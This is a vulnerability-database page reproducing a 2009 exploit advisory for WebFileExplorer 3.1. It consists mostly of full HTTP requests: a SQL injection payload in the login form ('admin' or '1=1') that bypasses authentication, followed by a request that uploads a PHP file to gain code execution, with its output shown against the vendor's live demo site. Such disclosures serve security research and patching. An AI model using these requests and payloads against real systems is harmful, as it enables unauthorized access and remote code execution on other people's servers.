Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WebFileExplorer 3.1 SQL Injection

🗓️ 09 Apr 2009 00:00:00Reported by OsirysType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 33 Views

WebFileExplorer 3.1 SQL Injection, Unauthorized Access, Remote Command Executio

Code
`Product Name: WebFileExplorer  
Version : 3.1  
URL : http://www.webfileexplorer.com/  
Price : 99 $ USD  
  
Credits to : Giovanni Buzzin, "Osirys"  
osirys[at]autistici[dot]org  
  
WebFileExplorer v3.1, is prone to multiple vulnerabilities. At first, an attacker can inject his evil sql code  
in the login form, bypassing it, he just needs to know the nick of an existent username to login as him.  
Live Exploiting: http://www.webfileexplorer.com/userdemo/  
Headers:  
http://www.webfileexplorer.com/userdemo/body.asp  
  
POST /userdemo/body.asp HTTP/1.1  
Host: www.webfileexplorer.com  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://www.webfileexplorer.com/userdemo/body.asp  
Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 71  
login_name=&dologin=yes&id=admin%27+or+%271%3D1&pwd=osirysp0wa&B1=Login  
  
Sending this request a remote attacker is able to bypass the login form.  
The sql injection used is: admin%27+or+%271%3D1  
so : admin' or '1=1  
  
Once the attacker logged in, from the Control Panel he's able to do a lot of things, upload all file of any  
extension, create files of any type, and so on. So this normal Authority Bypass can become a dangerous  
Arbitrary Shell Upload, so kinda of Remote Command Execution.  
  
Headers:  
  
http://www.webfileexplorer.com/userdemo/body.asp?action=savefile&path=/admindemo/demo/er  
  
POST /userdemo/body.asp?action=savefile&path=/admindemo/demo/er HTTP/1.1  
Host: www.webfileexplorer.com  
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://www.webfileexplorer.com/userdemo/body.asp?action=newfile  
Cookie: ASPSESSIONIDSCQCBDQR=CDMBDPMCINOGGDFHIFOJOLGL; ControlPan=max; fileoptions=max; folderoptions=max; SearchBoxStat=max; FoldersTree=off  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 96  
file=test_.php&newfilestuff=%3C%3Fphp+echo+%22I%27m+horn%3Cbr%3E%22%3B+%3F%3E&submit=create+file  
  
Let's see now, the response of the created file:  
  
osirys[~]>$ perl asd.txt http://www.webfileexplorer.com/admindemo/demo/er/test_.php I'm horn<br>  
osirys[~]>$  
  
Game Over.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Apr 2009 00:00Current
0.4Low risk
Vulners AI Score0.4
webfileexplorersql injectionunauthorized accessremote command executiongiovanni buzzin
33